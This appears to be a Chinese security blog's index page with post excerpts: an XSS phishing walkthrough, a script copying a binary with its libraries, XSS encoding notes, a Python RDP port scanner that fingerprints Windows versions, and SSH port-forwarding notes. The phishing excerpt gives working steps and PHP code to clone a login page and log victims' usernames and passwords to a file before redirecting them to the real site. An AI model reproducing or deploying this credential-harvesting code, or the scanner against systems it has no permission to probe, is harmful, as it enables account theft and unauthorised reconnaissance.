wubba lubba dub dub.

How To Fishing

post @ 2017-04-01

[XSS钓鱼模拟实战]https://bbs.ichunqiu.com/thread-17965-1-1.html

前置准备

目标登录页面: login.html
假的登录页面: fake.html
世界上最好的语言: deal.php
fish.js

钓鱼步骤

  • 先下载目标login.html,保存为fake.html: wget -r -p -np -k 网站地址

然后替换掉登录时候的POST目标地址,比如<form action="http://normal.com/login.php" method="post">,替换掉自己的deal.php页面。

注意事项: 页面中有部分js或者css不是绝对路径,要替换为绝对路径,最好直接使用wget下载login.html

  • 然后再服务器上构造一个deal.php
<?php
$user = $_POST['username'];
$pass = $_POST['password'];
$f = fopen('pass.txt','a');
fwrite($f, "User:".$user."Pass:".$pass."\n");
fclose($f);
header("Location: http://normal.com/manage"); //跳转到正常的后台
?>
  • 还差一个js
Read More

Linux复制带动态库的命令

post @ 2017-03-09

需求: 从一台Linux复制命令到另外一台上面,由于命令依赖动态库,比如gcc:

ldd `which gcc`
	linux-vdso.so.1 =>  (0x00007fffdb7eb000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcf12441000)
	/lib64/ld-linux-x86-64.so.2 (0x000055a28350c000)

这种情况下单单复制gcc没卵用,google了下找到某个bash脚本:

#!/bin/bash

if [ $# != 2 ] ; then
    echo "usage $0 PATH_TO_BINARY TARGET_FOLDER"
    exit 1
fi

PATH_TO_BINARY="$1"
TARGET_FOLDER="$2"

# if we cannot find the the binary we have to abort
if [ ! -f "$PATH_TO_BINARY" ] ; then
    echo "The file '$PATH_TO_BINARY' was not found. Aborting!"
    exit 1
fi

# copy the binary to the target folder
# create directories if required
echo "---> copy binary itself"
cp --parents -v "$PATH_TO_BINARY" "$TARGET_FOLDER"

# copy the required shared libs to the target folder
# create directories if required
echo "---> copy libraries"
for lib in `ldd "$PATH_TO_BINARY" | cut -d'>' -f2 | awk '{print $1}'` ; do
   if [ -f "$lib" ] ; then
        cp -v --parents "$lib" "$TARGET_FOLDER"
   fi  
done

# I'm on a 64bit system at home. the following code will be not required on a 32bit system.
# however, I've not tested that yet
# create lib64 - if required and link the content from lib to it
if [ ! -d "$TARGET_FOLDER/lib64" ] ; then
    mkdir -v "$TARGET_FOLDER/lib64"
fi

用法: exportbin.sh <path to the binary> <target floder>

Read More

xss基础编码

post @ 2017-03-02

html的实体编码,比如十进制编码和十六进制编码,需要放在html标签里面。

Fun fact Decoding Order:
1. HTML Decoding
2. URL Decoding
3. Javascript Decoding

http://slides.com/mscasharjaved/deck-13#/169

三种编码,对于html来说是(10进制和16进制)

html尖括号

  • 十进制:&#60;
  • html十六: &#x3c;

javascript的八进制和16进制以及unicode编码:

尖括号-->

  • 八进制:\74
  • 十六进制: \x3c
  • unicode编码: \u003c

url编码及base64编码(<)

  • url: %3C
  • base64: PA==
Read More

3389指纹扫描

post @ 2017-02-28

nmap的扫描原理没怎么探索,只知道使用nmap扫描的时候,目标服务器扫不出来东西。特地分析了下3389远程链接的过程。简单来说是这样的:

  • TCP三次握手
  • 客户端发送COTP协议
  • 服务端发送TPKT

原来是用socket编程这么简单,只需要抓wireshark,把TCP的数据封装为16进制发送出去就行了。

最后的python脚本是这样的:

#!/usr/bin/python
# coding: utf-8

import socket
import binascii
import sys
import threading
from Queue import Queue


def verify(sock, port):
	while 1:
		buff = sock.recv(2048)
		if not buff:
			break
		b = bytearray(buff)
		print "[+] %s" % binascii.hexlify(b)
		detect_os(binascii.hexlify(b), port)
		# if len(binascii.hexlify(b)) == 38:
		# 	print "[+] RDP Port is %s" % port
		# 	sys.exit(0)


def detect_os(res, port):
	d = {
		"2000": "0300000b06d00000123400",
		"2003": "030000130ed000001234000300080002000000",
		"2008": "030000130ed000001234000200080002000000",
		"win7OR2008R2": "030000130ed000001234000209080002000000",
		"2008R2DC": "030000130ed000001234000201080002000000",
		"2012R2OR8": "030000130ed00000123400020f080002000000"
	}
	for key, value in d.iteritems():
		if value == res:
			print "[+] Os May be: %s" % key
			print "[+] RDP Port is %s" % port
			sys.exit(0)
def send_payload(sock):
	sock.send("\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00")


def worker():
	while not q.empty():
		port = q.get()
		try:
			scan(port)
		finally:
			q.task_done()


def scan(port):
	try:
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.settimeout(2)
		sys.stdout.write('[+] Check Port %s \r' % port)
		sys.stdout.flush()
		if s.connect_ex((ip, port)) == 0:
			print "[+] Connect Success %s" % port
			send_payload(s)
			verify(s, port)
	except Exception, e:
		# raise e
		pass
	s.close()

if __name__ == '__main__':
	if len(sys.argv) != 2:
		print "Usage: %s IP" % sys.argv[0]
		sys.exit(0)
	ip = sys.argv[1]
	q = Queue()
	map(q.put, xrange(3300, 65535))
	threads = [threading.Thread(target=worker) for i in xrange(50)]
	map(lambda x: x.start(), threads)
	q.join()
Read More

SSH端口转发

post @ 2017-02-16

以下几个原则:

  • SSH简单来说就是2台机器之间安全的数据通道,它包括ssh的client和ssh的server2个角色,这样的一条通道就是(ssh tunneling)
  • SSH端口转发需要ssh连接,同时SSH连接有方向,从SSH Client到SSH Server
  • 同理应用请求也是有方向的,一般是客户端向服务端发出请求
  • 一旦这两个方向相同,称为SSH的本地转发(-L),反之称为远端转发(-R)

本地转发

ssh -L <local port>:<host>:<hostport> <sshserver>

通过sshserver建立与host的连接,并将host的hostport绑定到本地的localport端口

应用场景:比如有一台应用服务器appserver(appserver.com),要访问其80端口,但是本地却不能直接访问,于是可以借助一台可以访问appserver的sshserver(sshserver.com)来访问它。
ssh -L 8000:appserver.com:80 user@sshserver.com

ssh链接建立之后,发送到本地8000的包会通过sshserver转发给appserver的80端口

远程转发

ssh -R <remoteport>:<host>:<hostport> <remoteserver>
远程转发可以通过本地主机,将remoteserver与host连接,host的hostport
将会映射到remoteserver的remoteport端口

应用场景: 一台应用服务器appserver(appserver.com),只有本地才能访问80端口,假如remoteserver想访问appserver的80端口,需要通过本地主机做隧道来完成。

Read More
⬆︎TOP